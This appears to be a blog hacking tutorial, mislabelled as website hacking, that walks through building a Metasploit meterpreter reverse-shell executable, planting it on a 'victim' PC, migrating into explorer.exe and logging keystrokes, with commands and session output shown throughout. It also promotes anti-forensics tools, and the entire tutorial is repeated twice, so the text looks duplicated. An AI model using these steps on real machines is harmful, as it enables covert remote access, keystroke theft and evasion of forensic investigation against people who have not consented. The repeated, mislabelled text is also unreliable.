Hacking Website using METASPLOIT
How to hack website using metasploit?
METASPLOIT ANTI FORENSICS:Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult.
They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.Metasploit comes in the followingversions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPII would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.For those of all who don't know, Backtrackis a linux distro especially for security personals, including all the tools required by a pentester.Download Backtrack fromhere. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :Open up backtrack. You should have a screen similar to this.
The default login credentials are:Username: rootPass: toorType in
root@bt:~#/etc/init.d/wicd startto start the wicd managerFinally, type "startx" to start the GUI mode:
root@bt:~#startxFirst of all, know your Local Ip. Opening upa konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfigIt would be something like 192.168.x.x or 10.x.x.x.Have a note of it.
Now,Launch msfconsole by going toApplications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsoleYou should now be having a shell something similar to a command prompt in windows.
msf>
Let’s now create an executable file which establishes a remote connection betweenthe victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in thebottom left corner of the window)
root@bt:/opt/metasploit3/msf3#./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.(Everything has to be entered without quotes)You should get something like this:Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcpLength: 290Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3
#Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.Migrate it to your other computer in the same local network using a thumb drive orby uploading it online.
Now open the 1stshell window with msfconsole in it.
msf >Type the following:msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.255.130LHOST => 192.168.255.130msf exploit(handler) > set LPORT 4444LPORT => 4444 All the connections are done.
You have already made an executable file which makes a reverse connection to you.And now, you have set the meterpreter to listen to you on port 4444.The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit[*] Started reverse handler on192.168.255.130:4444[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444->192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like thismeterpreter >Type in ps to list the active processesmeterpreter > psSearch for explorer.exe and migrate to the processmeterpreter > migrate 5716[*] Migrating to 5716...[*] Migration completed successfully.meterpreter >Type in the following:meterpreter > use privNow, if you want to start the Keylogger activity on victim, just type keyscan_startNow, if you want to go to the victim’s computer,Jus type shellmeterpreter > shellProcess 5428 created.Channel 1 created.
C:\Windows\system32>
You would now be having a command prompt,Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>
whoamiwhoamiwin7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepadon the victim’s computer.
Type in:Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dumpDumping captured keystrokes... GaM3 0V3RP.S.
The above information is just for educational purposes only. You should test it against the computer you own.
I am not responsible for any crime, do it on your own risk.....:)
METASPLOIT ANTI FORENSICS:Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult.
They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.Metasploit comes in the followingversions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPII would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.For those of all who don't know, Backtrackis a linux distro especially for security personals, including all the tools required by a pentester.Download Backtrack fromhere. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :Open up backtrack. You should have a screen similar to this.
The default login credentials are:Username: rootPass: toorType in
root@bt:~#/etc/init.d/wicd startto start the wicd managerFinally, type "startx" to start the GUI mode:
root@bt:~#startxFirst of all, know your Local Ip. Opening upa konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfigIt would be something like 192.168.x.x or 10.x.x.x.Have a note of it.
Now,Launch msfconsole by going toApplications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsoleYou should now be having a shell something similar to a command prompt in windows.
msf>
Let’s now create an executable file which establishes a remote connection betweenthe victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in thebottom left corner of the window)
root@bt:/opt/metasploit3/msf3#./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.(Everything has to be entered without quotes)You should get something like this:Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcpLength: 290Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3
#Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.Migrate it to your other computer in the same local network using a thumb drive orby uploading it online.
Now open the 1stshell window with msfconsole in it.
msf >Type the following:msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.255.130LHOST => 192.168.255.130msf exploit(handler) > set LPORT 4444LPORT => 4444 All the connections are done.
You have already made an executable file which makes a reverse connection to you.And now, you have set the meterpreter to listen to you on port 4444.The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit[*] Started reverse handler on192.168.255.130:4444[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444->192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like thismeterpreter >Type in ps to list the active processesmeterpreter > psSearch for explorer.exe and migrate to the processmeterpreter > migrate 5716[*] Migrating to 5716...[*] Migration completed successfully.meterpreter >Type in the following:meterpreter > use privNow, if you want to start the Keylogger activity on victim, just type keyscan_startNow, if you want to go to the victim’s computer,Jus type shellmeterpreter > shellProcess 5428 created.Channel 1 created.
C:\Windows\system32>
You would now be having a command prompt,Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>
whoamiwhoamiwin7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepadon the victim’s computer.
Type in:Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dumpDumping captured keystrokes... GaM3 0V3RP.S.
The above information is just for educational purposes only. You should test it against the computer you own.
I am not responsible for any crime, do it on your own risk.....:)
Comments
Post a Comment